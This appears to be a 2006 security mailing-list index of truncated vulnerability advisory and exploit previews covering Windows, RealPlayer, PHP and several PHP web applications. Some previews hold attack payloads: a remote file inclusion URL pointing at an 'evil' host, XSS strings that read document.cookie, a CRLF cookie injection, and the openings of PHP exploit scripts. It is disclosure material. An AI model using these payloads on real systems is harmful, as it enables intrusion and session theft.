ZDI-06-007: Microsoft Windows Address Book (WAB) File Format Parsing
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-06-007.html
April 11, 2006

-- CVE ID:
CVE-2006-0014

-- Affected Vendor:
Microsoft

-- Affected Products:
Windows XP SP2
Windows 2000 SP4

-- TippingPoint(TM) IPS Cust

[ more ]  [ reply ]

New eVuln Advisory:
[V]Book Multiple Vulnerabilities
http://evuln.com/vulns/111/summary.html

--------------------Summary----------------
eVuln ID: EV0111
CVE: CVE-2006-1561 CVE-2006-1562 CVE-2006-1563
Software: [V]Book
Sowtware's Web Site: http://www.vscripts.pl/?id=vbook2
Versions: 2.0
Critical Le

[ more ]  [ reply ]

Realplayer .SWF Multiple Remote Memory Corruption Vulnerabilities

By Sowhat of Nevis Labs
Date: 2006.03.22

http://www.nevisnetworks.com
http://secway.org/advisory/AD20060322.txt

CVE: CVE-2006-0323
US CERT: VU#231028

Vendor
RealNetworks Inc.

Products affected:

Windows
RealPlayer 8
RealOne Playe

[ more ]  [ reply ]

phpListPro <= 2.0 - Remote File Include Vulnerability
--------------------------------------------------------
Software: phpListPro
Version: <=2.00
Type: Remote File Include Vulnerability
Date: April, 11th 2006
Vendor: SmartISoft
Page: http://smartisoft.com
Risc: High

Credits:
------------------

[ more ]  [ reply ]

k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDKSA-2006:069
http://www.mandriva.com/security/
____________________________________________________________________

[ more ]  [ reply ]

Application : Indexu
version : 5.0.0 5.0.1
URL : http://www.nicecoder.com/

Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit

Discovery by SnIpEr_SA

in (theme_path)
this file :
exploit:
http://example.com/indexu/index.php?theme_path=http://evil.t

[ more ]  [ reply ]

This vulnerability is caused by the PHP globals problem. http://www.hardened-php.net/globals-problem

Not vulnerable: PHP 4.4.1 and up or PHP 5.1.0 and up

Fix:

add

$GLOBALS = array();

to the top of the config file

[ more ]  [ reply ]

// Confixx 3.1.2 <= Cross Site Scripting Vuln //

-----------------------------------------------------------------

[~] Advistory by: LoK-Crew ~ Snake_23

[-] Exploit: http://www.victim.com/allgemein_transfer.php?monat=4&jahr=[XSS]

[-] Googledork: -

[+] Greetz to: Bluegeek and Team.Rootbox
[+] V

[ more ]  [ reply ]

===========================================================
Ubuntu Security Notice USN-269-1 April 11, 2006
xscreensaver vulnerability
CVE-2004-2655
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

[ more ]  [ reply ]

Title : PHPWebGallery Multiple Cross Site Scripting Vulnerabilities
Author: Mourad aka Psych0 <root__ at linuxmail org>
Moroccan Security Team
Vendor: www.phpwebgallery.net
Software: PHPWebGallery
Version: 1.4.1

category.php and picture.php scripts are vulnerable to XSS attacks.

Exploits:

http:/

[ more ]  [ reply ]

Title : phpMyForum Cross Site Scripting & CRLF injection
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.phpmyforum.de
Version: 4.0

Examples:

http://target/path/index.php?page=[xsscode]&type=text%2Fcss

http://target/path/index.php?template=css&type=some_url%0d%0aSet-Cookie%
3Aheader

[ more ]  [ reply ]

Title : Jbook Cross Site Scripting
Author: Mourad aka Psych0
Moroccan Security Team
Vendor: www.jmuller.net
Version: 1.3

Jbook Guestbook is a PHP/MySQL based guestbook script.

Vulnerability in index.php, this issue can allow an
attacker to bypass content filters and potentially carry out xss atta

[ more ]  [ reply ]

New eVuln Advisory:
phpNewsManager Multiple SQL Injections
http://evuln.com/vulns/110/summary.html

--------------------Summary----------------
eVuln ID: EV0110
CVE: CVE-2006-1560
Vendor: SkinTech Group
Vendor's Web Site: http://www.skintech.org/
Software: phpNewsManager
Versions: 1.48
Critical Leve

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PHPList <= 2.10.2 GLOBALS[] remote cmmnds xctn \r\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "-> this works against register_globals=On \r\n";
echo "a dork: inurl:\"lists/?p=subscribe\" | inurl:

[ more ]  [ reply ]

Author : Ph03n1X
email : king_purba (at) yahoo.co (dot) uk [email concealed]
site : http://kandangjamur.net/
vendor : www.vegadns.org
version: 0.99

XSS
----
PoC :
http://exam.com/vegadns/index.php?VDNS_Sessid=m42644r75o1eg4f7mb7e4rnpg7
&message=%3Ch1%3E%3Cmarquee%3Ealoo%3C/marquee%3E%3C/h1%3E

Vulnerable script is located in

[ more ]  [ reply ]

Original: http://www.silent-products.com/advisory4.5.06.txt

Myspace.com - Intricate Script Injection Vulnerability
Reported April 5th, 2006

Introduction
----------------
The following article details a real vulnerability within the major social network Myspace.com. The seriousness of this script i

[ more ]  [ reply ]

MyBB 1.10 'newthread.php' < CrossSiteScripting >

[ Devil-00 | D3vil-0x1 ]

[*] Conditions [*]
1- your unregisterd user
2- you have permissions to do newthread

[---------------]

do newthread with this username :-

<script>alert(document.cookie);</script>D3vil-0x1

Then Preview it ;)

[-----------

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[copy() Safe Mode Bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 2.4.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1608

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of it

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[tempnam() open_basedir bypass PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1494

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Muc

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[function *() php/apache Crash PHP 4.4.2 and 5.1.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 21.3.2006
- -Public: 8.4.2006
from SECURITYREASON.COM
CVE-2006-1549

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Muc

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpinfo() Cross Site Scripting PHP 5.1.2 and 4.4.2]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
- -Written: 26.2.2006
- -Public: 8.4.2006
from SecurityReason.Com
CVE-2006-0996

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Mu

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpOpenChat 3.0.x ADODB Server.php \"sql\" SQL injection\r\n";
echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
echo "dork: Welcome to your PHPOpenChat-Installation!\r\n\r\n";

if ($argc<4) {
echo "Usage: php

[ more ]  [ reply ]

k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k
k k k k k k k k k kk k k k k kk k k k k
kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk
k k k k k k k kk k k k k k k k

[ more ]  [ reply ]

Dear bugtraq-Reader

Last Thursday 6th April 2006, Oracle released a note on the Oracle knowledgebase Metalink with details about an unfixed security vulnerability (=0day) and a working test case (=exploit code) which effects all versions of Oracle from 9.2.0.0 to 10.2.0.3. This note "363848.1 ? A U

[ more ]  [ reply ]